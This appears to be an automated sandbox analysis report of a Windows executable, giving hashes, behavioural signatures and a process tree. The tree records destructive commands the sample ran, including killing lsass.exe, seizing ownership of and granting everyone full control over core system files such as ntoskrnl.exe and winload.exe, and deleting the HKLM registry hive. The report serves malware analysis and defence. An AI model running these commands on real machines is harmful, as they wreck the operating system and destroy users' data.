Analysis

  • max time kernel
    14s
  • max time network
    68s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    31-10-2024 01:00

Errors

Reason
Machine shutdown

General

  • Target

    6eb25168bde4a9e7f3a273229ca0fbf4f17133788b5c68bf3151eb48826e1169.exe

  • Size

    55KB

  • MD5

    09718d571b01cb93e6f983be7b99a4b2

  • SHA1

    d2d1212212bfc691e115b24e8132ae4658e510e8

  • SHA256

    6eb25168bde4a9e7f3a273229ca0fbf4f17133788b5c68bf3151eb48826e1169

  • SHA512

    9c7fad95ad56c1f457be067467886c7d23fa57734547688c64d16f37f3190cc017987278a2387b217e4a8108ac04d33b1fe5353cfb350717a839ecb6dd533098

  • SSDEEP

    1536:34dJooh0Wa0aer344Jw/ytUqVS5EkIijQ1fTNiPJ:34dzVTaer344JzthRZijQ1Ji

Malware Config

Signatures

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 24 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Drops file in Drivers directory 64 IoCs
  • Manipulates Digital Signatures 1 TTPs 64 IoCs

    Attackers can apply techniques such as changing the Authenticode and Cryptography registry keys so that their binary is treated as validly signed.

  • Possible privilege escalation attempt 22 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Modifies file permissions 1 TTPs 22 IoCs
  • Modifies system executable filetype association 2 TTPs 46 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 64 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\6eb25168bde4a9e7f3a273229ca0fbf4f17133788b5c68bf3151eb48826e1169.exe
    "C:\Users\Admin\AppData\Local\Temp\6eb25168bde4a9e7f3a273229ca0fbf4f17133788b5c68bf3151eb48826e1169.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2728
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\98E4.tmp\98E5.tmp\98E6.bat C:\Users\Admin\AppData\Local\Temp\6eb25168bde4a9e7f3a273229ca0fbf4f17133788b5c68bf3151eb48826e1169.exe"
      2⤵
      • Drops file in Drivers directory
      • Suspicious use of WriteProcessMemory
      PID:4640
      • C:\Windows\system32\fsutil.exe
        fsutil dirty query C:
        3⤵
          PID:3068
        • C:\Windows\System32\taskkill.exe
          taskkill /f /im taskmgr.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4684
        • C:\Windows\System32\taskkill.exe
          taskkill /f /im regedit.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4216
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\hal.dll /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4976
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\hal.dll /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:320
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\winload.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3932
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\winload.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3300
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\winresume.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1360
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3368
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\winlogon.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3604
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2480
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\wininit.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2284
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\wininit.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1076
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3488
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4068
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\regedit.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3612
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\regedit.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4996
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\taskmgr.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2248
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\taskmgr.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3524
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\consent.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2896
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\consent.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1892
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\drivers /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:2288
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\drivers /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1052
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\shutdown.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3808
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\shutdown.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1444
        • C:\Windows\System32\taskkill.exe
          taskkill /f /im lsass.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1080
        • C:\Windows\System32\reg.exe
          reg delete HKLM /f
          3⤵
          • Boot or Logon Autostart Execution: Active Setup
          • Manipulates Digital Signatures
          • Modifies system executable filetype association
          • Event Triggered Execution: Netsh Helper DLL
          • Checks processor information in registry
          • Enumerates system info in registry
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Modifies registry key
          PID:4864

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Local\Temp\98E4.tmp\98E5.tmp\98E6.bat

      Filesize

      2KB

      MD5

      ebcfb026e8f9137c99136ab348cb6817

      SHA1

      fbad88aee4e564567a7b9c11934ade9fc3c0a47d

      SHA256

      73e3d00900152813c2d3da00e2f16a162787e7de747e5d3e18a06cefe3e1ad51

      SHA512

      110422386157caf977a9e952c859344bf21aee9e0d148e42c2026428d3a9e20affe05e3c1f96082e943ddc6ea671f15e30f8c2b42f9d75845cb1abf2867da9b7

    • memory/2728-0-0x0000000140000000-0x0000000140027000-memory.dmp

      Filesize

      156KB

    • memory/2728-4-0x0000000140000000-0x0000000140027000-memory.dmp

      Filesize

      156KB

    • memory/2728-6-0x0000000140000000-0x0000000140027000-memory.dmp

      Filesize

      156KB